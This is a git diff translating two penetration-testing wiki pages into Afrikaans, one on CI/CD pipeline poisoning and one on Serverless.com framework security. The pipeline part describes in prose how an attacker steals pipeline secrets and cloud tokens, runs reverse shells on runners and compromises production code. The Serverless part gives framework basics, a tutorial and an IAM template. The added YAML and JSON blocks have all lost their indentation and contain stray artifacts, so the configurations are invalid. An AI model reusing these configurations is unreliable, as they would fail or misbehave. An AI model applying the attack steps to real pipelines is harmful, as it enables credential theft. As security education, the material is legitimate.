-Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
+Om die 3 variasies om 'n pypeline te vervuil te ken, laat ons kyk wat 'n aanvaller kan verkry na 'n suksesvolle eksploitatie:
 
-- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
-  - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
-- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
-  - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
-  - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
-  - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
-  - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
-- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+- **Geheime**: Soos voorheen genoem, vereis pypelines **bevoegdhede** vir hul werksgeleenthede (om die kode te verkry, dit te bou, dit te ontplooi...) en hierdie bevoegdhede word gewoonlik **in geheime toegestaan**. Hierdie geheime is gewoonlik toeganklik via **omgewing veranderlikes of lêers binne die stelsel**. Daarom sal 'n aanvaller altyd probeer om soveel geheime as moontlik te eksfiltreer.
+- Afhangende van die pypeline platform mag die aanvaller **die geheime in die konfigurasie moet spesifiseer**. Dit beteken dat as die aanvaller nie die CI konfigurasie pypeline kan wysig nie (**I-PPE** byvoorbeeld), kan hy **slegs die geheime wat daardie pypeline het, eksfiltreer**.
+- **Berekening**: Die kode word êrens uitgevoer, afhangende van waar dit uitgevoer word, mag 'n aanvaller in staat wees om verder te pivot.
+- **On-premises**: As die pypelines op plek uitgevoer word, mag 'n aanvaller eindig in 'n **interne netwerk met toegang tot meer hulpbronne**.
+- **Cloud**: Die aanvaller kan toegang verkry tot **ander masjiene in die cloud** maar kan ook **eksfiltreer** IAM rolle/dienste rekeninge **tokens** daarvan om **verdere toegang binne die cloud** te verkry.
+- **Platforms masjien**: Soms sal die werksgeleenthede binne die **pypelines platform masjiene** uitgevoer word, wat gewoonlik binne 'n cloud met **geen verdere toegang** is.
+- **Kies dit:** Soms sal die **pypelines platform verskeie masjiene geconfigureer hê** en as jy die **CI konfigurasie lêer kan wysig**, kan jy **aangee waar jy die kwaadwillige kode wil uitvoer**. In hierdie situasie sal 'n aanvaller waarskynlik 'n omgekeerde skulp op elke moontlike masjien uitvoer om te probeer om dit verder te exploiteer.
+- **Kompromitteer produksie**: As jy binne die pypeline is en die finale weergawe daaruit gebou en ontplooi word, kan jy **die kode wat in produksie gaan loop, kompromitteer**.
 
-## More relevant info
+## Meer relevante inligting
 
-### Tools & CIS Benchmark
+### Gereedskap & CIS Benchmark
 
-- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is 'n oopbron gereedskap vir die oudit van jou sagteware voorsieningsketting stap vir sekuriteits nakoming gebaseer op 'n nuwe [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). Die oudit fokus op die hele SDLC-proses, waar dit risiko's van kode tyd in ontplooi tyd kan onthul.
 
-### Top 10 CI/CD Security Risk
+### Top 10 CI/CD Sekuriteitsrisiko's
 
-Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
+Kyk na hierdie interessante artikel oor die top 10 CI/CD risiko's volgens Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
 
-### Labs
+### Laboratoriums
 
-- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
-- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
+- Op elke platform wat jy plaaslik kan uitvoer, sal jy vind hoe om dit plaaslik te begin sodat jy dit kan konfigureer soos jy wil om dit te toets.
+- Gitea + Jenkins laboratorium: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
 
-### Automatic Tools
+### Outomatiese Gereedskap
 
-- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is 'n statiese kode analise gereedskap vir infrastruktuur-as-kode.
 
-## References
+## Verwysings
 
 - [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
index bf1343702..f05ae848c 100644
--- a/src/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -1,303 +1,274 @@
-# Serverless.com Security
+# Serverless.com Veiligheid
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-### Organization
+### Organisasie
 
-An **Organization** is the highest-level entity within the Serverless Framework ecosystem. It represents a **collective group**, such as a company, department, or any large entity, that encompasses multiple projects, teams, and applications.
+'n **Organisasie** is die hoogste vlak entiteit binne die Serverless Framework ekosisteem. Dit verteenwoordig 'n **kollektiewe groep**, soos 'n maatskappy, departement, of enige groot entiteit, wat verskeie projekte, spanne, en toepassings insluit.
 
-### Team
+### Span
 
-The **Team** are the users with access inside the organization. Teams help in organizing members based on roles. **`Collaborators`** can view and deploy existing apps, while **`Admins`** can create new apps and manage organization settings.
+Die **Span** is die gebruikers met toegang binne die organisasie. Spanne help om lede te organiseer op grond van rolle. **`Samewerkers`** kan bestaande toepassings sien en ontplooi, terwyl **`Admins`** nuwe toepassings kan skep en organisasie-instellings kan bestuur.
 
-### Application
+### Toepassing
 
-An **App** is a logical grouping of related services within an Organization. It represents a complete application composed of multiple serverless services that work together to provide a cohesive functionality.
+'n **App** is 'n logiese groepe van verwante dienste binne 'n Organisasie. Dit verteenwoordig 'n volledige toepassing wat bestaan uit verskeie serverless dienste wat saamwerk om 'n samehangende funksionaliteit te bied.
 
-### **Services**
-
-A **Service** is the core component of a Serverless application. It represents your entire serverless project, encapsulating all the functions, configurations, and resources needed. It's typically defined in a `serverless.yml` file, a service includes metadata like the service name, provider configurations, functions, events, resources, plugins, and custom variables.
+### **Dienste**
 
+'n **Diens** is die kernkomponent van 'n Serverless toepassing. Dit verteenwoordig jou hele serverless projek, wat al die funksies, konfigurasies, en hulpbronne insluit wat nodig is. Dit word tipies gedefinieer in 'n `serverless.yml` lêer, 'n diens sluit metadata in soos die diensnaam, verskaffer konfigurasies, funksies, gebeurtenisse, hulpbronne, plugins, en persoonlike veranderlikes.
 ```yaml
 service: my-service
 provider:
-  name: aws
-  runtime: nodejs14.x
+name: aws
+runtime: nodejs14.x
 functions:
-  hello:
-    handler: handler.hello
+hello:
+handler: handler.hello
 ```
-
 <details>
 
-<summary>Function</summary>
+<summary>Funksie</summary>
 
-A **Function** represents a single serverless function, such as an AWS Lambda function. It contains the code that executes in response to events.
-
-It's defined under the `functions` section in `serverless.yml`, specifying the handler, runtime, events, environment variables, and other settings.
+'n **Funksie** verteenwoordig 'n enkele serverless funksie, soos 'n AWS Lambda funksie. Dit bevat die kode wat uitgevoer word in reaksie op gebeurtenisse.
 
+Dit is gedefinieer onder die `functions` afdeling in `serverless.yml`, wat die handler, runtime, gebeurtenisse, omgewingsveranderlikes, en ander instellings spesifiseer.
 ```yaml
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - http:
-          path: hello
-          method: get
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
 ```
-
 </details>
 
 <details>
 
-<summary>Event</summary>
+<summary>Gebeurtenis</summary>
 
-**Events** are triggers that invoke your serverless functions. They define how and when a function should be executed.
-
-Common event types include HTTP requests, scheduled events (cron jobs), database events, file uploads, and more.
+**Gebeurtenisse** is triggers wat jou serverless funksies aanroep. Hulle definieer hoe en wanneer 'n funksie uitgevoer moet word.
 
+Gewone gebeurtenistipes sluit HTTP versoeke, geskeduleerde gebeurtenisse (cron jobs), databasis gebeurtenisse, lêer opgelaai, en meer in.
 ```yaml
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - http:
-          path: hello
-          method: get
-      - schedule:
-          rate: rate(10 minutes)
+hello:
+handler: handler.hello
+events:
+- http:
+path: hello
+method: get
+- schedule:
+rate: rate(10 minutes)
 ```
-
 </details>
 
 <details>
 
-<summary>Resource</summary>
+<summary>Hulpbronne</summary>
 
-**Resources** allow you to define additional cloud resources that your service depends on, such as databases, storage buckets, or IAM roles.
-
-They are specified under the `resources` section, often using CloudFormation syntax for AWS.
+**Hulpbronne** stel jou in staat om addisionele wolkhulpbronne te definieer waarop jou diens afhanklik is, soos databasisse, stoor emmers of IAM rolle.
 
+Hulle word onder die `resources` afdeling gespesifiseer, dikwels met behulp van CloudFormation-sintaksis vir AWS.
 ```yaml
 resources:
-  Resources:
-    MyDynamoDBTable:
-      Type: AWS::DynamoDB::Table
-      Properties:
-        TableName: my-table
-        AttributeDefinitions:
-          - AttributeName: id
-            AttributeType: S
-        KeySchema:
-          - AttributeName: id
-            KeyType: HASH
-        ProvisionedThroughput:
-          ReadCapacityUnits: 1
-          WriteCapacityUnits: 1
+Resources:
+MyDynamoDBTable:
+Type: AWS::DynamoDB::Table
+Properties:
+TableName: my-table
+AttributeDefinitions:
+- AttributeName: id
+AttributeType: S
+KeySchema:
+- AttributeName: id
+KeyType: HASH
+ProvisionedThroughput:
+ReadCapacityUnits: 1
+WriteCapacityUnits: 1
 ```
-
 </details>
 
 <details>
 
-<summary>Provider</summary>
+<summary>Verskaffer</summary>
 
-The **Provider** object specifies the cloud service provider (e.g., AWS, Azure, Google Cloud) and contains configuration settings relevant to that provider.
-
-It includes details like the runtime, region, stage, and credentials.
+Die **Verskaffer** objek spesifiseer die wolkdiensteverskaffer (bv. AWS, Azure, Google Cloud) en bevat konfigurasie-instellings wat relevant is vir daardie verskaffer.
 
+Dit sluit besonderhede in soos die runtime, streek, fase, en geloofsbriewe.
 ```yaml
 yamlCopy codeprovider:
-  name: aws
-  runtime: nodejs14.x
-  region: us-east-1
-  stage: dev
+name: aws
+runtime: nodejs14.x
+region: us-east-1
+stage: dev
 ```
-
 </details>
 
 <details>
 
-<summary>Stage and Region</summary>
-
-The stage represents different environments (e.g., development, staging, production) where your service can be deployed. It allows for environment-specific configurations and deployments.
+<summary>Fase en Streek</summary>
 
+Die fase verteenwoordig verskillende omgewings (bv., ontwikkeling, staging, produksie) waar jou diens ontplooi kan word. Dit stel spesifieke konfigurasies en ontplooiings vir die omgewing in staat.
 ```yaml
 provider:
-  stage: dev
+stage: dev
 ```
-
-The region specifies the geographical region where your resources will be deployed. It's important for latency, compliance, and availability considerations.
-
+Die streek spesifiseer die geografiese streek waar jou hulpbronne ontplooi sal word. Dit is belangrik vir latensie, nakoming en beskikbaarheids oorwegings.
 ```yaml
 provider:
-  region: us-west-2
+region: us-west-2
 ```
-
 </details>
 
 <details>
 
 <summary>Plugins</summary>
 
-**Plugins** extend the functionality of the Serverless Framework by adding new features or integrating with other tools and services. They are defined under the `plugins` section and installed via npm.
-
+**Plugins** brei die funksionaliteit van die Serverless Framework uit deur nuwe kenmerke by te voeg of te integreer met ander gereedskap en dienste. Hulle word onder die `plugins` afdeling gedefinieer en geïnstalleer via npm.
 ```yaml
 plugins:
-  - serverless-offline
-  - serverless-webpack
+- serverless-offline
+- serverless-webpack
 ```
-
 </details>
 
 <details>
 
-<summary>Layers</summary>
-
-**Layers** allow you to package and manage shared code or dependencies separately from your functions. This promotes reusability and reduces deployment package sizes. They are defined under the `layers` section and referenced by functions.
+<summary>Lae</summary>
 
+**Lae** stel jou in staat om gedeelde kode of afhanklikhede apart van jou funksies te pak en te bestuur. Dit bevorder herbruikbaarheid en verminder die grootte van ontplooiingspakkette. Hulle word onder die `layers` afdeling gedefinieer en deur funksies verwys.
 ```yaml
 layers:
-  commonLibs:
-    path: layer-common
+commonLibs:
+path: layer-common
 functions:
-  hello:
-    handler: handler.hello
-    layers:
-      - { Ref: CommonLibsLambdaLayer }
+hello:
+handler: handler.hello
+layers:
+- { Ref: CommonLibsLambdaLayer }
+```
+</details>
+
+<details>
+
+<summary>Veranderlikes en Aangepaste Veranderlikes</summary>
+
+**Veranderlikes** stel dinamiese konfigurasie in staat deur die gebruik van plekhouers wat by ontplooiingstyd opgelos word.
+
+- **Sintaksis:** `${variable}` sintaksis kan omgewingveranderlikes, lêerinhoud of ander konfigurasieparameters verwys.
+
+```yaml
+functions:
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
+```
+
+* **Aangepaste Veranderlikes:** Die `custom` afdeling word gebruik om gebruikerspesifieke veranderlikes en konfigurasies te definieer wat regdeur die `serverless.yml` hergebruik kan word.
+
+```yaml
+custom:
+tableName: my-dynamodb-table
+stage: ${opt:stage, 'dev'}
 ```
 
 </details>
 
 <details>
 
-<summary>Variables and Custom Variables</summary>
-
-**Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time.
-
-- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
-
-  ```yaml
-  functions:
-    hello:
-      handler: handler.hello
-      environment:
-        TABLE_NAME: ${self:custom.tableName}
-  ```
-
-* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
-
-  ```yaml
-  custom:
-    tableName: my-dynamodb-table
-    stage: ${opt:stage, 'dev'}
-  ```
-
-</details>
-
-<details>
-
-<summary>Outputs</summary>
-
-**Outputs** define the values that are returned after a service is deployed, such as resource ARNs, endpoints, or other useful information. They are specified under the `outputs` section and often used to expose information to other services or for easy access post-deployment.
+<summary>Uitsette</summary>
 
+**Uitsette** definieer die waardes wat teruggegee word nadat 'n diens ontplooi is, soos hulpbron ARNs, eindpunte, of ander nuttige inligting. Hulle word onder die `outputs` afdeling gespesifiseer en word dikwels gebruik om inligting aan ander dienste bloot te stel of vir maklike toegang na ontplooiing.
 ```yaml
 ¡outputs:
-  ApiEndpoint:
-    Description: "API Gateway endpoint URL"
-    Value:
-      Fn::Join:
-        - ""
-        - - "https://"
-          - Ref: ApiGatewayRestApi
-          - ".execute-api."
-          - Ref: AWS::Region
-          - ".amazonaws.com/"
-          - Ref: AWS::Stage
+ApiEndpoint:
+Description: "API Gateway endpoint URL"
+Value:
+Fn::Join:
+- ""
+- - "https://"
+- Ref: ApiGatewayRestApi
+- ".execute-api."
+- Ref: AWS::Region
+- ".amazonaws.com/"
+- Ref: AWS::Stage
 ```
-
 </details>
 
 <details>
 
-<summary>IAM Roles and Permissions</summary>
-
-**IAM Roles and Permissions** define the security credentials and access rights for your functions and other resources. They are managed under the `provider` or individual function settings to specify necessary permissions.
+<summary>IAM Rolle en Toestemmings</summary>
 
+**IAM Rolle en Toestemmings** definieer die sekuriteitsakkredite en toegangregte vir jou funksies en ander hulpbronne. Hulle word bestuur onder die `provider` of individuele funksie-instellings om nodige toestemmings te spesifiseer.
 ```yaml
 provider:
-  [...]
-  iam:
-    role:
-      statements:
-        - Effect: 'Allow'
-          Action:
-            - 'dynamodb:PutItem'
-            - 'dynamodb:Get*'
-            - 'dynamodb:Scan*'
-            - 'dynamodb:UpdateItem'
-            - 'dynamodb:DeleteItem'
-          Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+[...]
+iam:
+role:
+statements:
+- Effect: 'Allow'
+Action:
+- 'dynamodb:PutItem'
+- 'dynamodb:Get*'
+- 'dynamodb:Scan*'
+- 'dynamodb:UpdateItem'
+- 'dynamodb:DeleteItem'
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
 ```
-
 </details>
 
 <details>
 
-<summary>Environment Variables</summary>
-
-**Variables** allow you to pass configuration settings and secrets to your functions without hardcoding them. They are defined under the `environment` section for either the provider or individual functions.
+<summary>Omgewing Veranderlikes</summary>
 
+**Veranderlikes** stel jou in staat om konfigurasie-instellings en geheime inligting aan jou funksies oor te dra sonder om dit hard te kodifiseer. Hulle word gedefinieer onder die `environment` afdeling vir óf die verskaffer óf individuele funksies.
 ```yaml
 provider:
-  environment:
-    STAGE: ${self:provider.stage}
+environment:
+STAGE: ${self:provider.stage}
 functions:
-  hello:
-    handler: handler.hello
-    environment:
-      TABLE_NAME: ${self:custom.tableName}
+hello:
+handler: handler.hello
+environment:
+TABLE_NAME: ${self:custom.tableName}
 ```
-
 </details>
 
 <details>
 
-<summary>Dependencies</summary>
-
-**Dependencies** manage the external libraries and modules your functions require. They typically handled via package managers like npm or pip, and bundled with your deployment package using tools or plugins like `serverless-webpack`.
+<summary>Afhangighede</summary>
 
+**Afhangighede** bestuur die eksterne biblioteke en modules wat jou funksies benodig. Hulle word tipies hanteer deur middel van pakketbestuurders soos npm of pip, en saamgepak met jou ontplooiingspakket met behulp van gereedskap of plugins soos `serverless-webpack`.
 ```yaml
 plugins:
-  - serverless-webpack
+- serverless-webpack
 ```
-
 </details>
 
 <details>
 
 <summary>Hooks</summary>
 
-**Hooks** allow you to run custom scripts or commands at specific points in the deployment lifecycle. They are defined using plugins or within the `serverless.yml` to perform actions before or after deployments.
-
+**Hooks** stel jou in staat om pasgemaakte skripte of opdragte op spesifieke punte in die ontplooiing lewensiklus uit te voer. Hulle word gedefinieer met behulp van plugins of binne die `serverless.yml` om aksies voor of na ontplooiings uit te voer.
 ```yaml
 custom:
-  hooks:
-    before:deploy:deploy: echo "Starting deployment..."
+hooks:
+before:deploy:deploy: echo "Starting deployment..."
 ```
-
 </details>
 
 ### Tutorial
 
-This is a summary of the official tutorial [**from the docs**](https://www.serverless.com/framework/docs/tutorial):
-
-1. Create an AWS account (Serverless.com start in AWS infrastructure)
-2. Create an account in serverless.com
-3. Create an app:
+Dit is 'n opsomming van die amptelike tutoriaal [**uit die dokumentasie**](https://www.serverless.com/framework/docs/tutorial):
 
+1. Skep 'n AWS-rekening (Serverless.com begin in AWS-infrastruktuur)
+2. Skep 'n rekening in serverless.com
+3. Skep 'n app:
 ```bash
 # Create temp folder for the tutorial
 mkdir /tmp/serverless-tutorial
@@ -313,26 +284,22 @@ serverless #Choose first one (AWS / Node.js / HTTP API)
 ## Create A New App
 ## Indicate a name like "tutorialapp)
 ```
-
-This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function:
+Dit behoort 'n **app** genaamd `tutorialapp` te geskep het wat jy kan nagaan in [serverless.com](serverless.com-security.md) en 'n gids genaamd `Tutorial` met die lêer **`handler.js`** wat 'n paar JS-kode bevat met 'n `helloworld` kode en die lêer **`serverless.yml`** wat daardie funksie verklaar:
 
 {{#tabs }}
 {{#tab name="handler.js" }}
-
 ```javascript
 exports.hello = async (event) => {
-  return {
-    statusCode: 200,
-    body: JSON.stringify({
-      message: "Go Serverless v4! Your function executed successfully!",
-    }),
-  }
+return {
+statusCode: 200,
+body: JSON.stringify({
+message: "Go Serverless v4! Your function executed successfully!",
+}),
+}
 }
 ```
-
 {{#endtab }}
 {{#tab name="serverless.yml" }}
-
 ```yaml
 # "org" ensures this Service is used with the correct Serverless Framework Access Key.
 org: testing12342
@@ -342,130 +309,122 @@ app: tutorialapp
 service: Tutorial
 
 provider:
-  name: aws
-  runtime: nodejs20.x
+name: aws
+runtime: nodejs20.x
 
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - httpApi:
-          path: /
-          method: get
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com/<org name>/settings/providers?providerId=new&provider=aws`.
-   1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
-   2. This template generates a role called **`SFRole-<ID>`** with **`arn:aws:iam::aws:policy/AdministratorAccess`** over the account with a Trust Identity that allows `Serverless.com` AWS account to access the role.
+4. Skep 'n AWS verskaffer deur in die **dashboard** te gaan op `https://app.serverless.com/<org name>/settings/providers?providerId=new&provider=aws`.
+1. Om `serverless.com` toegang tot AWS te gee, sal dit vra om 'n cloudformation-stapel te loop met hierdie konfigurasie-lêer (op die tyd van hierdie skrywe): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
+2. Hierdie sjabloon genereer 'n rol genaamd **`SFRole-<ID>`** met **`arn:aws:iam::aws:policy/AdministratorAccess`** oor die rekening met 'n Trust Identity wat `Serverless.com` AWS-rekening toelaat om toegang tot die rol te verkry.
 
 <details>
 
 <summary>Yaml roleTemplate</summary>
-
 ```yaml
 Description: This stack creates an IAM role that can be used by Serverless Framework for use in deployments.
 Resources:
-  SFRole:
-    Type: AWS::IAM::Role
-    Properties:
-      AssumeRolePolicyDocument:
-        Version: "2012-10-17"
-        Statement:
-          - Effect: Allow
-            Principal:
-              AWS: arn:aws:iam::486128539022:root
-            Action:
-              - sts:AssumeRole
-            Condition:
-              StringEquals:
-                sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
-      Path: /
-      RoleName: !Ref RoleName
-      ManagedPolicyArns:
-        - arn:aws:iam::aws:policy/AdministratorAccess
-  ReporterFunction:
-    Type: Custom::ServerlessFrameworkReporter
-    Properties:
-      ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
-      OrgUid: !Ref OrgUid
-      RoleArn: !GetAtt SFRole.Arn
-      Alias: !Ref Alias
+SFRole:
+Type: AWS::IAM::Role
+Properties:
+AssumeRolePolicyDocument:
+Version: "2012-10-17"
+Statement:
+- Effect: Allow
+Principal:
+AWS: arn:aws:iam::486128539022:root
+Action:
+- sts:AssumeRole
+Condition:
+StringEquals:
+sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}"
+Path: /
+RoleName: !Ref RoleName
+ManagedPolicyArns:
+- arn:aws:iam::aws:policy/AdministratorAccess
+ReporterFunction:
+Type: Custom::ServerlessFrameworkReporter
+Properties:
+ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec"
+OrgUid: !Ref OrgUid
+RoleArn: !GetAtt SFRole.Arn
+Alias: !Ref Alias
 Outputs:
-  SFRoleArn:
-    Description: "ARN for the IAM Role used by Serverless Framework"
-    Value: !GetAtt SFRole.Arn
+SFRoleArn:
+Description: "ARN for the IAM Role used by Serverless Framework"
+Value: !GetAtt SFRole.Arn
 Parameters:
-  OrgUid:
-    Description: Serverless Framework Org Uid
-    Type: String
-  Alias:
-    Description: Serverless Framework Provider Alias
-    Type: String
-  RoleName:
-    Description: Serverless Framework Role Name
-    Type: String
+OrgUid:
+Description: Serverless Framework Org Uid
+Type: String
+Alias:
+Description: Serverless Framework Provider Alias
+Type: String
+RoleName:
+Description: Serverless Framework Role Name
+Type: String
 ```
-
 </details>
 
 <details>
 
-<summary>Trust Relationship</summary>
-
+<summary>Vertrouensverhouding</summary>
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::486128539022:root"
-      },
-      "Action": "sts:AssumeRole",
-      "Condition": {
-        "StringEquals": {
-          "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::486128539022:root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb"
+}
+}
+}
+]
 }
 ```
-
 </details>
 
-5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas.
+5. Die tutoriaal vra om die lêer `createCustomer.js` te skep wat basies 'n nuwe API-eindpunt sal skep wat deur die nuwe JS-lêer hanteer word en vra om die `serverless.yml`-lêer te wysig om dit te laat genereer 'n **nuwe DynamoDB-tabel**, 'n **omgewing veranderlike** te definieer, die rol wat die gegenereerde lambdas sal gebruik.
 
 {{#tabs }}
 {{#tab name="createCustomer.js" }}
-
 ```javascript
 "use strict"
 const AWS = require("aws-sdk")
 module.exports.createCustomer = async (event) => {
-  const body = JSON.parse(Buffer.from(event.body, "base64").toString())
-  const dynamoDb = new AWS.DynamoDB.DocumentClient()
-  const putParams = {
-    TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
-    Item: {
-      primary_key: body.name,
-      email: body.email,
-    },
-  }
-  await dynamoDb.put(putParams).promise()
-  return {
-    statusCode: 201,
-  }
+const body = JSON.parse(Buffer.from(event.body, "base64").toString())
+const dynamoDb = new AWS.DynamoDB.DocumentClient()
+const putParams = {
+TableName: process.env.DYNAMODB_CUSTOMER_TABLE,
+Item: {
+primary_key: body.name,
+email: body.email,
+},
+}
+await dynamoDb.put(putParams).promise()
+return {
+statusCode: 201,
+}
 }
 ```
-
 {{#endtab }}
 
 {{#tab name="serverless.yml" }}
-
 ```yaml
 # "org" ensures this Service is used with the correct Serverless Framework Access Key.
 org: testing12342
@@ -475,388 +434,379 @@ app: tutorialapp
 service: Tutorial
 
 provider:
-  name: aws
-  runtime: nodejs20.x
-  environment:
-    DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
-  iam:
-    role:
-      statements:
-        - Effect: "Allow"
-          Action:
-            - "dynamodb:PutItem"
-            - "dynamodb:Get*"
-            - "dynamodb:Scan*"
-            - "dynamodb:UpdateItem"
-            - "dynamodb:DeleteItem"
-          Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
+name: aws
+runtime: nodejs20.x
+environment:
+DYNAMODB_CUSTOMER_TABLE: ${self:service}-customerTable-${sls:stage}
+iam:
+role:
+statements:
+- Effect: "Allow"
+Action:
+- "dynamodb:PutItem"
+- "dynamodb:Get*"
+- "dynamodb:Scan*"
+- "dynamodb:UpdateItem"
+- "dynamodb:DeleteItem"
+Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
 
 functions:
-  hello:
-    handler: handler.hello
-    events:
-      - httpApi:
-          path: /
-          method: get
-  createCustomer:
-    handler: createCustomer.createCustomer
-    events:
-      - httpApi:
-          path: /
-          method: post
+hello:
+handler: handler.hello
+events:
+- httpApi:
+path: /
+method: get
+createCustomer:
+handler: createCustomer.createCustomer
+events:
+- httpApi:
+path: /
+method: post
 
 resources:
-  Resources:
-    CustomerTable:
-      Type: AWS::DynamoDB::Table
-      Properties:
-        AttributeDefinitions:
-          - AttributeName: primary_key
-            AttributeType: S
-        BillingMode: PAY_PER_REQUEST
-        KeySchema:
-          - AttributeName: primary_key
-            KeyType: HASH
-        TableName: ${self:service}-customerTable-${sls:stage}
+Resources:
+CustomerTable:
+Type: AWS::DynamoDB::Table
+Properties:
+AttributeDefinitions:
+- AttributeName: primary_key
+AttributeType: S
+BillingMode: PAY_PER_REQUEST
+KeySchema:
+- AttributeName: primary_key
+KeyType: HASH
+TableName: ${self:service}-customerTable-${sls:stage}
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-6. Deploy it running **`serverless deploy`**
-   1. The deployment will be performed via a CloudFormation Stack
-   2. Note that the **lambdas are exposed via API gateway** and not via direct URLs
-7. **Test it**
-   1. The previous step will print the **URLs** where your API endpoints lambda functions have been deployed
+6. Ontplooi dit met **`serverless deploy`**
+1. Die ontplooiing sal uitgevoer word deur 'n CloudFormation Stack
+2. Let daarop dat die **lambdas blootgestel word via API gateway** en nie via direkte URL's nie
+7. **Toets dit**
+1. Die vorige stap sal die **URL's** druk waar jou API eindpunte lambda funksies ontplooi is
 
-## Security Review of Serverless.com
+## Sekuriteitsherziening van Serverless.com
 
-### **Misconfigured IAM Roles and Permissions**
+### **Verkeerd geconfigureerde IAM Rolle en Toestemmings**
 
-Overly permissive IAM roles can grant unauthorized access to cloud resources, leading to data breaches or resource manipulation.
